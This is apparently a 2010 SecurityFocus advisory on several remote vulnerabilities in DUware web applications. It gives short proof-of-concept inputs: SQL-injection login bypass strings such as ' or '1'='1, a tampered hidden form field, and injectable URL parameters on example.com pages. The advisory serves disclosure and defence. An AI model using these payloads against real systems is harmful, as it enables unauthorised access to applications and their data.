DUware Software Multiple Remote Vulnerabilities

No exploit is required.

The following proof of concept examples are available:

DUclassmate:
<input type="hidden" name="MM_recordId" value="[Your ID Number]">

DUclassified:
http://www.example.com/DUclassified/admin/
user= admin' or '1'='1

http://www.example.com/DUclassified/adDe tail.asp?cat_id=1;[SQL INJECT]&sub_id=1;[SQL INJECT]

DUforum:
user= admin
password= ' or '1'='1

http://www.example.com/DUforum/messages.asp?FOR_ID=1;[SQL INJECT]
http://www.example.com/DUforum/messageDetail.asp?MSG_ID=1;[SQL INJECT]


 

Privacy Statement
Copyright 2010, SecurityFocus